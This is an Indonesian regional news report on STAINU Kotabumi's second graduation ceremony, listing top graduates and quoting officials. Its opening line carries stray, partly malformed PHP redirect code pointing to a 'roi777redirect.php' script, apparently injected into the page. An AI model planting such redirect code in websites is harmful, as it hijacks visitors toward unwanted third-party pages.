header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); STAINU Kotabumi Wisuda 87 Mahasiswa Strata 1 -
STAINU Kotabumi Wisuda 87 Mahasiswa Strata 1

TRANSLAMPUNG.COM, KOTABUMI – Sekolah Tinggi Agama Islam Nahdatul Ulama (STAINU) Kabupaten Lampung Utara mewisuda 87 mahasiswa Strata 1 Angkatan ke – 2 yang dilaksanakan di Halaman Kantor PCNU Lampung Utara, Selasa(03/07/2018).

Acara Wisuda STAINU Kotabumi Lampung Utara, Selain dihadiri para Wisudawan dan Wiasudawati beserta keluarganya, juga dihadiri oleh Bupati Lampung Utara H Agung Ilmu Mangkunegara yang diwakili oleh Kepala Dinas Pendidikan Drs. Suwandi MM, Ketua Kopertasi Wilayah VII Sumbagsel yang diwakili oleh Sekretaris Drs, H Herizal MA, Kementerian Agama, Forkompinda, dan Para pimpinan Pondok Pesantren yang ada di Kabupaten Lampung Utara.

Dalam kesempatan itu Ketua STAINU Kotabumi, Drs. H. Munzir, M.H.I menyampaikan bahwa hari ini dirinya mewisuda 87 mahasiswa STAINU Kotabumi Lampung Utara Angkatan Ke-2, dan ini lebih banyak dari Angkatan pertamanya tahun 2017 sebanyak 58 Mahasiswa. Untuk lulusan terbaik ada dua prodi, yaitu prodi pendidikan bahasa arab dan prodi Ahwal Al Syakhiyyah.

“Untuk lulus terbaik angkatan 2013 pendidikan Bahasa Arab diraih oleh, Bibit Lestari dengan IPK 3.60, dan angkatan 2014 diraih oleh Linda Riyani dengan IPK 3.65. Sementara untuk Ahwa Al Syakhiyyah angkatan 2013 diraih oleh Eka Riyanto dengan IPK 3.80, dan angkatan 2014 diraih oleh Muhammad Iskandar dengan IPK 3.80,” ucapnya.

Lanjut Munzir, Wisuda hari ini bukanlah akhir dari proses belajar, namun masih banyak yang harus dikerjakan, utamanya pengabdian kepada masyarakat.

“Oleh karenanya kami berharap kepada mahasiswa dan mahasiswi yang di wisuda hari ini agar dapat senantiasa menjaga nama baik almamaternya STAINU dan dapat berkiprah serta memberikan manfaat terbaik kepada masyarakat.Dengan catatan harus mengikuti perkembangan jaman, karena yang namanya perkembangan jaman dalam kaidah Fiqhiyah itu kan tidak mungkin perubahan suatu jaman itu, tidak diimbangi dengan perkembangan jaman dan peraturan hokum,” tuturnya.

Lebih lanjut Munzir mengatakan, Sarjana bukan hanya tentang gelar yang disandang tetapi juga dinilai dari cara berfikir dan dituntut untuk mengamalkan ilmu dikehidupan bermasyarakat.

“Selain itu penting menjaga tradisi, mengembangkan inovasi dalam menghadapi tuntutan zaman yang terus bergerak cepat,” pungkasnya.

Sementara dalam sambutan Bupati Lampung Utara yang dibacakan oleh Kepala Dinas Pendidikan Suwandi menyampaikan atas nama pribadi dan pelayan masyarakat Kabupaten Lampung Utara mengucapkan selamat kepada para wisuda dan wisudawati yang yelah berhasil menyelesaikan studinya.

“Semoga ini dapat menjadi motivasi dalam berjuang bersama almamater untuk semakin berperan aktip dalam membangun kehidupan masyarakat yang agamais dan bermartabat,” ucap Suwandi.

Disinilah peran penting STAINU Kotabumi sebagai salah satu tempat pendidikan Sumber Daya Manusia, Yang diharapkan bisa melahirkan lulusan yang siap terjun ke masyarakat sebagai pelaku pembangunan termasuk pembangunan moral ke agamaan.

“Mari bersama kita lanjutkan membangun Kabupaten Lampung Utara agar semakin aman, maju, sejahtera, agamais dan bermartabat,” pungkasnya. (eka)

News Reporter